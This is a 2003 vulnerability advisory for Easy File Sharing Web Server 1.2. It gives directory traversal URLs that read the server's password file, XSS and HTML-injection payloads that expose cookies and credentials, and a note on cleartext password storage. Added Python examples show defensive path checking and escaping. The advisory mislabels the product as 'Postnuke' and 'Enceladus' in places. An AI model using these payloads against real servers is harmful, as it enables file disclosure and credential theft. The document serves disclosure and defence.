easyfile.txt
Posted Sep 16, 2003
Authored by Dr. Insane

Easy File Sharing Web Server 1.2 is vulnerable to directory traversal bugs, cross-site scripting, HTML injection, and password snatching because passwords are left in the clear.

tags | exploit, web, xss
SHA-256 | f44612ef4731652eedc76c34971ccef6fbab01c107847e6496e2fa6d924e38f8

Advisory for Easy File Sharing web server 1.2...

---

------------------------------------------------------------------
Easy File Sharing Web Server 1.2

------------------------------------------------------------------
-= by Dr_insane (dr_insane@pathfinder.gr) =-



Product:
--------
Easy File Sharing Web Server 1.2


Vulnerability(s):
-----------------
1. Directory Traversal Bugs
2. XSS vulnerabilities
3. HTML Injection
4. Passwords in clear text

Description of product:
-----------------------
Easy File Sharing Web Server is a file sharing system that allows visitors to upload/download files easily through a Web Browser (IE, Netscape, Opera etc.). It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs. They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (BBS, Forum). It allows remote users to post messages and files to the forum.


VULNERABILITY / EXPLOIT
=======================
There are multiple vulnerabilities in Postnuke Easy File Sharing Web Server 1.2, as described below.

1. Directory traversing

Easy File Sharing Web Server has a directory traversal vulnerability. Using the string '../' in a URL, an attacker can gain read access to any file outside of the intended web-published filesystem directory.

There is not much to expand on this one....

Example:
http://127.0.0.1/../../../autoexec.bat to show autoexec.bat
http://127.0.0.1/.../.../.../program files/Easy File Sharing Web Server/users.sdb get the server password file

Also:
http://127.0.0.1/msg.ghp?forumid=4&id=/../../../../../../../../windows/win.ini
http://127.0.0.1/msg.ghp?forumid=/../../../../../../../../windows/win.ini

etc etc etc
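
A server-side check that refuses the request shapes listed above, as an added example (not code from the advisory or the vendor). The document root `WEB_ROOT` and the function names are assumptions; the check covers dot-only segments in the path and in every query value, then confirms the canonical path stays under the root.

```python
import ntpath
from urllib.parse import parse_qsl, unquote, urlsplit

WEB_ROOT = r"C:\efs\wwwroot"  # assumed document root (hypothetical path)


def has_dot_segment(value):
    """True if any path segment is made only of dots ('..', '...', ...)."""
    segments = value.replace("\\", "/").split("/")
    return any(len(s) >= 2 and set(s) == {"."} for s in segments)


def resolve(url, root=WEB_ROOT):
    """Map a request URL to a file under root; return None to refuse it."""
    parts = urlsplit(url)
    path = unquote(parts.path)
    # The advisory shows traversal both in the path and in the forumid/id
    # query values, so every decoded value gets the same check.
    values = [path] + [v for _, v in parse_qsl(parts.query)]
    if any(has_dot_segment(v) or "\x00" in v for v in values):
        return None
    # Canonicalise, then confirm the result is still inside the root.
    root_norm = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_norm, path.lstrip("/\\")))
    try:
        inside = ntpath.commonpath([root_norm, candidate]).lower() == root_norm.lower()
    except ValueError:  # e.g. a drive letter in the request changed the drive
        inside = False
    return candidate if inside else None


# Request shapes taken from the advisory, plus constructed benign/encoded ones.
SAMPLES = [
    "http://127.0.0.1/../../../autoexec.bat",
    "http://127.0.0.1/.../.../.../program files/Easy File Sharing Web Server/users.sdb",
    "http://127.0.0.1/msg.ghp?forumid=4&id=/../../../../../../../../windows/win.ini",
    "http://127.0.0.1/%2e%2e/%2e%2e/autoexec.bat",   # constructed: encoded dots
    "http://127.0.0.1/D:/windows/win.ini",           # constructed: drive switch
    "http://127.0.0.1/msg.ghp?forumid=4&id=12",      # constructed: benign
]

if __name__ == "__main__":
    for url in SAMPLES:
        print("ALLOW" if resolve(url) else "DENY ", url)
```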

2. XSS vulnerabilities

A vulnerability exists in the Easy File Sharing Web Server that involves incorrect filtering of server signature data. The vulnerability could enable an attacker to hijack web sessions, allowing a range of potential compromises on the targeted host.

The vulnerable URLs are:

http://127.0.0.1/newmsg.ghp?forumid=1 Insert evil JavaScript code in the "Your message" field

The following URL will demonstrate the attack:

Some browsers submit the malicious host header when parsing this request:
Host: <img src="" onerror="alert(document.cookie)">

For example, if we supply this code: <script>alert(document.cookie)</script> we will get:

TEMPLATE:standard;LANG=english; TOKEN:121234122; TOKEN_1=34123123; SHOW_FEATURES=0; db_pass; db_user; SESSIONID=1172; UsserID:dr_insane; PassWD=passtest1111

It is possible for someone to get the username and the password. In our example,
the username is: dr_insane and the password: passtest1111

3. HTML Injection

Any user can inject HTML code when creating a new post.
The bug is in the post icon:

<img src="icon.gif" etc.>
If you create a personalized form with this code: icon.gif">
<script>alert('bug');<script><anytag="
the final code of the post icon is :
<img src="icon.gif"><script>alert('bug');<script><anytag="" etc.>
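
Sections 2 and 3 both come down to untrusted input reaching HTML unescaped, and the cookie dump above shows credentials readable from script. The following is an added example (not from the advisory or the vendor) of context-aware escaping for the message body, post icon and Host header, plus a session cookie that carries no credentials; the function names, icon allowlist and page template are assumptions.

```python
import html
import re
import secrets

# Assumed policy: a post icon must be a bare image file name.
ICON_RE = re.compile(r"[A-Za-z0-9_-]{1,32}\.(gif|png|jpg)")
DEFAULT_ICON = "icon.gif"


def safe_icon(value):
    """Return value only if it is a bare image file name, else the default."""
    return value if ICON_RE.fullmatch(value) else DEFAULT_ICON


def render_post(icon, message, host):
    """Build the HTML for one forum post from three untrusted inputs."""
    template = (
        '<img src="{icon}" alt="">\n'
        '<div class="msg">{message}</div>\n'
        '<small>served by {host}</small>'
    )
    return template.format(
        icon=html.escape(safe_icon(icon), quote=True),   # attribute context
        message=html.escape(message, quote=False),       # element content
        host=html.escape(host, quote=True),              # reflected Host header
    )


def new_session_cookie():
    """Set-Cookie value: opaque random id only, not readable via document.cookie."""
    token = secrets.token_urlsafe(32)
    return "SESSIONID={}; HttpOnly; SameSite=Strict; Path=/".format(token)


# Inputs quoted in the advisory, used here as test data for the renderer.
ADVISORY_ICON = "icon.gif\"><script>alert('bug');<script><anytag=\""
ADVISORY_MESSAGE = "<script>alert(document.cookie)</script>"
ADVISORY_HOST = '<img src="" onerror="alert(document.cookie)">'

if __name__ == "__main__":
    print(render_post(ADVISORY_ICON, ADVISORY_MESSAGE, ADVISORY_HOST))
    print(new_session_cookie())
```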

4. Passwords in clear text

A vulnerability has been identified in Enceladus Server suite allowing malicious, local users to see usernames and passwords.

The problem is that usernames and passwords for the server are stored in clear text in the folder "users.sdb".


Local:
------
Yes

Remote:
-------
We can 0wn the server via remote!


Credits:
--------
Dr_insane
dr_insane@pathfinder.gr , dr_insane@hack.gr
Http://members.lycos.co.uk/r34ct/








----------------------------
Dr_Insane
members.lycos.co.uk/r34ct/
----------------------------
